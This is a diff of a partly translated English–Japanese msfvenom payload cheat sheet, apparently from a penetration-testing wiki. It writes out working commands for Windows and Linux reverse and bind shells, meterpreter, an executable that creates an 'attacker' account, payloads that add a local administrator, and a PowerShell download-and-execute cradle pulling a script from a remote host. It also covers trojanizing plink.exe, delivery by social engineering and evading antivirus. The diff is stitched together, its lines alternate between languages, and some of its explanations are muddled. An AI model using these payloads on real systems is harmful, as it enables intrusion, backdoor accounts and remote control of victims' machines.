-This command generates an executable file named "adduser.exe" that, when executed on the target system, will create a user with the specified username and password. +In this command, replace `username` with the desired username and `password` with the desired password. The `-f` option specifies the output format, in this case, an executable file (`exe`). The output is redirected to a file named `adduser.exe`. -このコマンドは、「adduser.exe」という名前の実行可能ファイルを生成します。このファイルは、ターゲットシステムで実行されると、指定したユーザー名とパスワードでユーザーを作成します。 +Once you have generated the payload, you can deliver it to the target system using various methods, such as social engineering or exploiting vulnerabilities. Once executed on the target system, the payload will create a new user with the specified username and password. -You can then deliver this payload to the target system using various methods, such as social engineering or exploiting vulnerabilities. - -その後、ソーシャルエンジニアリングや脆弱性の悪用など、さまざまな方法を使用して、このペイロードをターゲットシステムに送信することができます。 +It is important to note that creating a user on a target system without proper authorization is illegal and unethical. This information is provided for educational purposes only. Always ensure you have the necessary permissions and legal authorization before performing any actions on a target system. ```bash msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe ``` ### CMDシェル -The CMD shell is a command-line interpreter for Windows operating systems. It provides a way to interact with the operating system by executing commands and scripts. The CMD shell is commonly used by system administrators and power users for various tasks, such as managing files and directories, running programs, and configuring system settings. +The CMD shell is a command-line interpreter for Windows operating systems. It provides a way to interact with the operating system by executing commands and scripts. The CMD shell is commonly used by system administrators and power users for various tasks, including managing files and directories, running programs, and configuring system settings. #### Creating a CMD Shell Payload with msfvenom @@ -165,17 +163,17 @@ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= Replace `` with your IP address and `` with the port number you want to use for the reverse shell connection. -This command will generate a Windows executable file named `shell.exe` that, when executed on the target system, will establish a reverse TCP connection to your machine. +This command will generate an executable file named `shell.exe` that, when executed on the target system, will establish a reverse TCP connection to your machine. #### Executing the CMD Shell Payload To execute the CMD shell payload on the target system, you can use various methods, such as social engineering, exploiting vulnerabilities, or using a post-exploitation framework like Metasploit. -Once the payload is executed on the target system, it will establish a reverse TCP connection to your machine. You can then interact with the CMD shell on the target system through your listener. +Once the payload is executed, it will establish a reverse TCP connection to your machine, allowing you to interact with the target system's CMD shell remotely. #### Conclusion -The CMD shell is a powerful tool for interacting with Windows operating systems. By creating and executing CMD shell payloads, you can gain remote access to target systems and perform various tasks for penetration testing or other purposes. +The CMD shell is a powerful tool for interacting with Windows operating systems. By creating and executing CMD shell payloads, you can gain remote access to target systems and perform various tasks for penetration testing or other legitimate purposes. ```bash msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe ``` @@ -183,19 +181,17 @@ msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f ex The `msfvenom` tool can be used to generate payloads that can execute arbitrary commands on the target system. This can be useful for various purposes, such as gaining remote access or performing post-exploitation activities. -`msfvenom` provides the `exec` payload option, which allows you to specify a command to be executed on the target system. The generated payload can then be delivered to the target using various methods, such as email attachments, malicious downloads, or social engineering techniques. - To generate a payload that executes a command, you can use the following command: ``` -msfvenom -p cmd/unix/reverse +msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT= -f -o ``` -Replace `` with the appropriate options for your specific scenario. For example, you can specify the IP address and port of your listener using the `LHOST` and `LPORT` options. +Replace `` with the IP address of the machine running the listener, and `` with the port number on which the listener is running. `` should be replaced with the desired output format, such as `elf`, `exe`, or `raw`. `` should be replaced with the name of the file where the payload will be saved. -Once the payload is generated, you can deliver it to the target and execute the command by establishing a connection to your listener. This can be done using tools like `netcat` or `meterpreter`. +Once the payload is generated, it can be delivered to the target system using various methods, such as social engineering or exploiting vulnerabilities. When the payload is executed on the target system, it will establish a reverse connection to the attacker's machine and allow the execution of arbitrary commands. -Keep in mind that executing arbitrary commands on a target system without proper authorization is illegal and unethical. Always ensure that you have the necessary permissions and legal authorization before performing any actions that may compromise the security of a system. +It is important to note that the success of executing commands on the target system depends on various factors, such as the target's security measures and the privileges of the user executing the payload. Additionally, the payload should be crafted carefully to avoid detection by antivirus software or intrusion detection systems. ```bash msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe @@ -232,98 +228,145 @@ Once the payload is embedded into the executable file, it can be executed on the ```bash msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe ``` -The reverse shell payload is a commonly used technique in penetration testing. It allows an attacker to establish a connection from the target machine to their own machine, giving them remote access and control over the target. +### リバースシェル -To create a reverse shell payload using `msfvenom`, you can use the following command: +リバースシェルは、ターゲットマシンからハッカーのマシンに接続するための一般的な方法です。ハッカーは、リバースシェルを使用して、ターゲットマシンに対してコマンドを実行したり、ファイルを転送したりすることができます。 + +リバースシェルを作成するために、`msfvenom`ツールを使用します。以下のコマンドを使用して、リバースシェルペイロードを作成します。 ```bash msfvenom -p LHOST= LPORT= -f -o ``` -- ``: The payload to use. This can be any compatible payload, such as `linux/x86/shell_reverse_tcp`. -- ``: The IP address of the attacker's machine. -- ``: The port on the attacker's machine to listen on. -- ``: The output format for the payload. This can be `elf`, `raw`, `exe`, `psh`, `asp`, `jsp`, `war`, `pl`, `py`, `rb`, `dll`, `so`, `osx`, `macho`, `elf`, `deb`, `rpm`, `jar`, `msi`, `hta`, `vba`, `vbs`, `hta-psh`, `asp-psh`, `jsp-psh`, `war-psh`, `pl-psh`, `py-psh`, `rb-psh`, `dll-psh`, `so-psh`, `osx-psh`, `macho-psh`, `elf-psh`, `deb-psh`, `rpm-psh`, `jar-psh`, `msi-psh`, `hta-psh-net`, `asp-psh-net`, `jsp-psh-net`, `war-psh-net`, `pl-psh-net`, `py-psh-net`, `rb-psh-net`, `dll-psh-net`, `so-psh-net`, `osx-psh-net`, `macho-psh-net`, `elf-psh-net`, `deb-psh-net`, `rpm-psh-net`, `jar-psh-net`, or `msi-psh-net`. -- ``: The file to save the payload to. +- ``: 使用するペイロードの種類を指定します。 +- ``: ハッカーのマシンのIPアドレスを指定します。 +- ``: ハッカーのマシンで使用するポート番号を指定します。 +- ``: 出力ファイルの形式を指定します。 +- ``: 出力ファイルの名前とパスを指定します。 -For example, to create a reverse shell payload using the `linux/x86/shell_reverse_tcp` payload, with the attacker's IP address set to `192.168.0.100` and the port set to `4444`, and save it as `reverse_shell.elf`, you would use the following command: +例えば、以下のコマンドは、`bash`シェルを使用してリバースシェルペイロードを作成します。 ```bash msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f elf -o reverse_shell.elf ``` -Once the payload is created, you can transfer it to the target machine and execute it to establish a reverse shell connection. +このコマンドは、`linux/x86/shell_reverse_tcp`ペイロードを使用して、ハッカーのマシンのIPアドレスが`192.168.0.100`で、ポート番号が`4444`であるリバースシェルペイロードを作成します。出力ファイルの形式は`elf`であり、`reverse_shell.elf`という名前のファイルに保存されます。 + +ハッカーは、作成されたリバースシェルペイロードをターゲットマシンに送信し、接続を確立することができます。 ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf ``` -A bind shell is a type of shell that listens for incoming connections on a specific port. Once a connection is established, the bind shell provides a command prompt interface to interact with the target system. This allows an attacker to gain remote access and control over the compromised system. +### バインドシェル -To create a bind shell payload using msfvenom, you can use the following command: +バインドシェルは、攻撃者がターゲットマシンに接続し、リモートでコマンドを実行するための方法です。バインドシェルを使用すると、攻撃者はターゲットマシンの制御を取得し、様々な操作を行うことができます。 -``` -msfvenom -p LHOST= LPORT= -f -o +バインドシェルを作成するために、私たちは`msfvenom`ツールを使用します。`msfvenom`は、Metasploitフレームワークの一部であり、様々なペイロードを生成するために使用されます。 + +以下のコマンドを使用して、バインドシェルのペイロードを生成します。 + +```plaintext +msfvenom -p LHOST= LPORT= -f -o ``` -- ``: The payload to use, such as `windows/meterpreter/reverse_tcp` or `linux/x86/shell/bind_tcp`. -- ``: The IP address of the attacker machine. -- ``: The port number to listen on. -- ``: The output format, such as `exe`, `elf`, or `raw`. -- ``: The file to save the generated payload. +- ``: 使用するペイロードの種類を指定します。 +- ``: 攻撃者のIPアドレスを指定します。 +- ``: 攻撃者が接続するポート番号を指定します。 +- ``: ペイロードの出力形式を指定します。 +- ``: 生成されたペイロードを保存するファイルのパスを指定します。 -For example, to create a bind shell payload for a Windows system, listening on port 4444, and save it as an executable file named `shell.exe`, you can use the following command: +例えば、以下のコマンドを使用して、Linuxシステム向けのバインドシェルを生成します。 -``` -msfvenom -p windows/meterpreter/bind_tcp LHOST= LPORT=4444 -f exe -o shell.exe +```plaintext +msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.0.100 LPORT=4444 -f elf -o shell.elf ``` -Remember to replace `` with your actual IP address. +このコマンドは、`linux/x86/shell_bind_tcp`ペイロードを使用し、攻撃者のIPアドレスが`192.168.0.100`であり、ポート番号が`4444`であるバインドシェルを生成します。出力形式は`elf`であり、生成されたペイロードは`shell.elf`という名前のファイルに保存されます。 -Once the payload is generated, you can transfer it to the target system and execute it. Once the bind shell is established, you can use a compatible listener, such as Metasploit's `multi/handler`, to connect to the target system and gain remote access. +バインドシェルを作成した後は、攻撃者は生成されたペイロードをターゲットマシンにデプロイし、接続を確立することができます。これにより、攻撃者はターゲットマシン上でコマンドを実行し、システムにアクセスすることができます。 ```bash msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf ``` ### SunOS(Solaris) -SunOS(Solaris)は、Sun Microsystemsによって開発された商用UNIXオペレーティングシステムです。SunOSは、高い信頼性とスケーラビリティを備えたシステムであり、特に企業環境で広く使用されています。 +SunOS(Solaris)は、Sun Microsystemsによって開発された商用のUNIXオペレーティングシステムです。SunOSは、高い信頼性とスケーラビリティを備えたサーバー向けのオペレーティングシステムとして広く使用されています。 -### Metasploit Frameworkとmsfvenom +#### ペイロードの生成 -Metasploit Frameworkは、セキュリティテストやペネトレーションテストに使用されるオープンソースのフレームワークです。msfvenomは、Metasploit Frameworkの一部であり、ペイロードの生成とエクスプロイトの作成に使用されます。 +msfvenomコマンドを使用して、SunOS(Solaris)向けのペイロードを生成することができます。以下のコマンドを使用して、指定したアーキテクチャとフォーマットに基づいたペイロードを生成します。 -### msfvenomの概要 - -msfvenomは、Metasploit Frameworkのコマンドラインツールであり、様々なプラットフォームで動作するペイロードを生成するために使用されます。ペイロードは、悪意のあるコードやコマンドを含むバイナリファイルです。 - -msfvenomを使用すると、様々なエクスプロイトシナリオに対応したペイロードを生成することができます。また、生成されたペイロードは、特定のプラットフォームやアーキテクチャに最適化されています。 - -### msfvenomの使用方法 - -msfvenomコマンドを使用するには、以下のような構文を使用します。 - -``` -msfvenom -p [options] +```plaintext +msfvenom -p -f -a -o ``` -ここで、``は生成するペイロードの種類を指定します。オプションは、生成するペイロードの設定やパラメータを指定するために使用されます。 +- ``: 使用するペイロードの種類を指定します。 +- ``: 生成するペイロードのフォーマットを指定します。 +- ``: ターゲットのアーキテクチャを指定します。 +- ``: 生成されたペイロードの出力先ファイルを指定します。 -msfvenomは、様々なプラットフォームやアーキテクチャに対応しており、生成するペイロードの種類も豊富です。また、生成されたペイロードは、実行可能なファイルやスクリプト、バイナリデータなどの形式で保存することができます。 +#### ペイロードの実行 -### msfvenomの例 +生成されたペイロードをターゲットマシンで実行するには、以下の手順に従います。 -以下は、msfvenomを使用してWindowsプラットフォーム向けのペイロードを生成する例です。 +1. ペイロードをターゲットマシンに転送します。 +2. ペイロードを実行するための適切な方法を選択します。これには、リモートシェル、リバースシェル、またはメモリ内実行などの方法があります。 +3. ペイロードを実行し、ターゲットマシンにアクセスします。 -``` -msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > payload.exe -``` +#### ペイロードのエクスプロイト -この例では、`windows/meterpreter/reverse_tcp`というペイロードを生成しています。`LHOST`と`LPORT`は、攻撃者のIPアドレスとポート番号を指定するためのオプションです。生成されたペイロードは、`payload.exe`という名前の実行可能ファイルとして保存されます。 +ペイロードを使用してエクスプロイトを実行するには、以下の手順に従います。 -### msfvenomの応用 +1. ターゲットマシンにペイロードを転送します。 +2. ペイロードを実行するための適切な方法を選択します。 +3. エクスプロイトを実行し、ターゲットマシンを侵害します。 -msfvenomは、ペネトレーションテストやセキュリティテストにおいて、エクスプロイトの作成や脆弱性の検証に使用されます。生成されたペイロードは、悪意のある攻撃者がターゲットシステムに侵入するために使用されることがあります。 +#### ペイロードのカスタマイズ -msfvenomを使用する際には、法的な制約や倫理的な観点を考慮し、適切な許可を得ることが重要です。また、自身のシステムやネットワークに対してテストを行う場合には、十分な注意と専門知識が必要です。 +msfvenomコマンドを使用して生成されたペイロードは、必要に応じてカスタマイズすることができます。以下のオプションを使用して、ペイロードのプロパティを変更します。 + +- `-b `: 使用しないバイトを指定します。 +- `-e `: ペイロードをエンコードするエンコーダを指定します。 +- `-i `: エンコーダの反復回数を指定します。 +- `-x